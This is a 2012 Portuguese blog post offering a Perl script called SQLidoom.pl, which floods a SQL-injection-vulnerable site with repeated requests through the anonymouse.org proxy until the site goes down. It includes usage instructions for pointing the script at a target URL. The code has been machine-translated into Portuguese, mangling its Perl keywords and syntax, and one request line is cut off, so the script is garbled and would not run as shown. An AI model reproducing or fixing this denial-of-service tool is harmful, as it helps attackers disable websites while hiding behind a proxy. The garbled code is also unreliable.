http://skamason.com/7b9R

http://skamason.com/7b9R

quarta-feira, 9 de maio de 2012

SQLI DoS script para vulnerabilidade de injeção SQL

eu apresento um script antes de você que pode DoS local uma injeção de SQL vulneráveis.
Em Perl..

Aqui está:


#! / Usr / bin / perl-w
#
# SQLidoom.pl
# Por b14ck .. .. [((3]
# Só não faça algo estúpido com esta ferramenta, este é apenas para "educação" e divertido!
# Eu não estou Responsável pelo mau uso deste software.

usar LWP :: UserAgent;

meu agente $ = LWP :: UserAgent-> new;
# Use seu agente personalizado
$ Agente-> agent ("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: 1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$ Agente-> tempo limite (5);
meu proxy $ = "http://anonymouse.org/cgi-bin/anon-www.cgi/";
if ($ ARGV [0]) {
começar ($ argv [0]);
Else {}
info ();
}
# Iniciar o ataque
sub início {
print "\ n [+] Meta:". $ _ [0]. "\ N";
print "\ n [+] Iniciando o ataque \ n [+] Informações: Control + C para parar o ataque \ n \ n";
print "\ n [+] usando proxy $ procuração \ n \ n";
my $ i = 0;
while (1) {
$ SIG {INT} = \ &stop;
$ Code agente = ($ proxy. $ _ [0]. "E
print "[" $ i. "]. Tente \ n";
$ I + +;
unless ($ code-> is_success) {
print "[+] Site Down - Em R $ petições i \ n?";
}
}
}
# Cancelar o ataque
parada sub {
print "\ n [+] Parando ataque \ n";
sair 0;
}
# Informações
Informações sub {
print "\ nAttack um site SQLI vulnerável com alguns \" Magia \ "e levá-la para baixo em poucos segundos";
print "\ nAo .. 0x141A1D58FF .. [((3] \ n";
print "\ nUsage: perl $ 0 <destino> \ n";
print "[info] \ n";
print "<destino> deveria ser assim http://www.target.com/something.php?id=1 \ n";
print "\ nExemplo:";
print "\ nperl $ 0 'http://www.target.com/something.php?id=1' \ n \ n";
sair 0;
}

agente sub {
return $ agente-> get ($ _ [0]);
}

Nenhum comentário:

Postar um comentário